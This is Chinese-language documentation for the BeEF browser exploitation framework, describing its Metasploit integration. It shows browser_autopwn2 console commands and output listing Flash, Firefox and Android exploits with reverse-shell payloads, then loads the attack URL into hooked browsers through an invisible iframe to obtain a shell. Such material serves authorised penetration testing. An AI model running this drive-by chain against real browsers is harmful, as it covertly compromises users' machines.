BeEF中文文档BeEF Metasploit
介绍
Metasploit是用于渗透测试的另一种基于ruby 的开源安全工具。它具有漏洞利用、payloads、shellcode等。
BeEF支持Metasploit集成,并且只需要一些简单的配置即可启动和运行。一旦运行,Metasploit模块可以直接通过BeEF界面运行。
Metasploit模块
启动Metasploit之后,您可以在BeEF命令模块树中找到其模块:
所有常规的有效负载CLI参数在模块的界面中都有自己的表单字段:
执行模块后等待漏洞的使用:
浏览器自动
虽然没有直接集成到BeEF中,但是您可以使用Metasploit的Browser Autopwn功能:
msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > show options
Module options (auxiliary/server/browser_autopwn2):
Name Current Setting Required Description
---- --------------- -------- -----------
EXCLUDE_PATTERN no Pattern search to exclude specific modules
INCLUDE_PATTERN no Pattern search to include specific modules
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
首先,启动browser_autopwn或browser_autopwn2在Metasploit中启动并获取BrowserAutoPwn URL,例如:
msf auxiliary(browser_autopwn2) > run -z
[*] Auxiliary module execution completed
[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) >
[*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 6.01071043
[*] Using URL: http://0.0.0.0:8080/5WNrYZjr
[*] Local IP: http://10.1.1.175:8080/5WNrYZjr
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
Order Rank Name Payload
----- ---- ---- -------
1 Excellent webview_addjavascriptinterface android/meterpreter/reverse_tcp on 4443
2 Excellent samsung_knox_smdm_url android/meterpreter/reverse_tcp on 4443
3 Excellent firefox_svg_plugin firefox/shell_reverse_tcp on 4442
4 Excellent firefox_webidl_injection firefox/shell_reverse_tcp on 4442
5 Excellent firefox_tostring_console_injection firefox/shell_reverse_tcp on 4442
6 Excellent firefox_proto_crmfrequest firefox/shell_reverse_tcp on 4442
7 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444
8 Great adobe_flash_shader_drawing_fill windows/meterpreter/reverse_tcp on 4444
9 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444
10 Great adobe_flash_hacking_team_uaf windows/meterpreter/reverse_tcp on 4444
11 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444
12 Great adobe_flash_opaque_background_uaf windows/meterpreter/reverse_tcp on 4444
13 Great adobe_flash_pixel_bender_bof windows/meterpreter/reverse_tcp on 4444
14 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444
15 Great adobe_flash_copy_pixels_to_byte_array windows/meterpreter/reverse_tcp on 4444
16 Great adobe_flash_worker_byte_array_uaf windows/meterpreter/reverse_tcp on 4444
17 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444
18 Great adobe_flash_domain_memory_uaf windows/meterpreter/reverse_tcp on 4444
19 Good adobe_flash_uncompress_zlib_uninitialized windows/meterpreter/reverse_tcp on 4444
20 Good wellintech_kingscada_kxclientdownload windows/meterpreter/reverse_tcp on 4444
21 Good ms14_064_ole_code_execution windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://10.1.1.175:8080/5WNrYZjr
[*] Server started.
[*] Starting the payload handler...
请注意BrowserAutoPwn URL: http://10.1.1.175:8080/5WNrYZjr
然后使用“ 创建不可见的iframe”命令模块将自动pwn页面加载到iFrame中:
然后,只需一个shell:
推荐文章: